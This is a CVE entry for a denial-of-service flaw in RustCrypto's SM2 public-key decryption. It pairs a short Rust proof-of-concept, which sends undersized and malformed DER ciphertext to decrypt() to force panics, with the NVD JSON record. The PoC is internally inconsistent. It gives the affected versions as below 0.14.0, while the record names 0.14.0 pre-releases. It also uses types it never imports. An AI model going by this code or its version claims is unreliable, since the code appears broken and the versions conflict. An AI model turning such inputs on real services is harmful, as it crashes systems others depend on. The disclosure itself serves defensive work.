CVE-2026-22700

// CVE-2026-22700 PoC - SM2 PKE Decrypt DoS // Affected: RustCrypto elliptic-curves < 0.14.0 (excluding patched versions) use sm2pke256v1::{PublicKey, DecryptingKey}; fn trigger_dos_via_short_ciphertext() { // Generate a valid key pair first let secret_key = SecretKey::random(&mut OsRng); let public_key = PublicKey::from(&secret_key); // Create a short/undersized ciphertext to trigger panic // The decrypt function expects certain minimum length, // providing shorter data causes slice::split_at to panic let short_ciphertext = b"\x00\x01"; // Too short for SM2 decryption let decrypt_key = DecryptingKey::from(&secret_key); // This will trigger panic due to unchecked split_at let _result = decrypt_key.decrypt(short_ciphertext); } fn trigger_dos_via_malformed_der() { // Create a malformed DER-encoded structure // that causes incorrect offset calculation in parsing let malformed_ciphertext = vec![ 0x30, 0x00, // SEQUENCE with zero length 0x02, 0x01, 0x01, // INTEGER 0x30, 0x03, 0x02, 0x01, 0x02 ]; let secret_key = SecretKey::random(&mut OsRng); let decrypt_key = DecryptingKey::from(&secret_key); // Trigger panic via malformed structure let _result = decrypt_key.decrypt(&malformed_ciphertext); } // Note: This PoC demonstrates the vulnerability concept. // Actual exploitation requires specific knowledge of SM2 PKE format. // The patch (commit e60e991) adds bounds checking before split_at calls.

{"cve": {"id": "CVE-2026-22700", "sourceIdentifier": "[email protected]", "published": "2026-01-10T06:15:52.517", "lastModified": "2026-01-22T14:53:48.393", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "RustCrypto: Elliptic Curves is general purpose Elliptic Curve Cryptography (ECC) support, including types and traits for representing various elliptic curve forms, scalars, points, and public/secret keys composed thereof. In versions 0.14.0-pre.0 and 0.14.0-rc.0, a denial-of-service vulnerability exists in the SM2 public-key encryption (PKE) implementation: the decrypt() path performs unchecked slice::split_at operations on input buffers derived from untrusted ciphertext. An attacker can submit short/undersized ciphertext or carefully-crafted DER-encoded structures to trigger bounds-check panics (Rust unwinding) which crash the calling thread or process. This issue has been patched via commit e60e991."}, {"lang": "es", "value": "RustCrypto: Curvas Elípticas es soporte de Criptografía de Curva Elíptica (ECC) de propósito general, incluyendo tipos y rasgos para representar varias formas de curvas elípticas, escalares, puntos y claves públicas/secretas compuestas de ellos. En las versiones 0.14.0-pre.0 y 0.14.0-rc.0, existe una vulnerabilidad de denegación de servicio en la implementación de cifrado (PKE) de clave pública SM2: la ruta decrypt() realiza operaciones slice::split_at sin verificar en búferes de entrada derivados de texto cifrado no confiable. Un atacante puede enviar texto cifrado corto/subdimensionado o estructuras codificadas en DER cuidadosamente elaboradas para activar pánicos de verificación de límites (desenrolle de Rust) que bloquean el hilo o proceso que realiza la llamada. Este problema ha sido parcheado mediante el commit e60e991."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:pre0:*:*:*:rust:*:*", "matchCriteriaId": "5F5BCFE9-1585-4A90-857F-7F9E1B9C9ADA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:rustcrypto:sm2_elliptic_curve:0.14.0:rc0:*:*:*:rust:*:*", "matchCriteriaId": "B584C50F-8ED4-45F4-8799-7CCFE8D4DF66"}]}]}], "references": [{"url": "https://github.com/RustCrypto/elliptic-curves/commit/e60e99167a9a2b187ebe80c994c5204b0fdaf4ab", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/RustCrypto/elliptic-curves/pull/1603", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-j9xq-69pf-pcm8", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/RustCrypto/elliptic-curves/security/advisories/GHSA-j9xq-69pf-pcm8", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}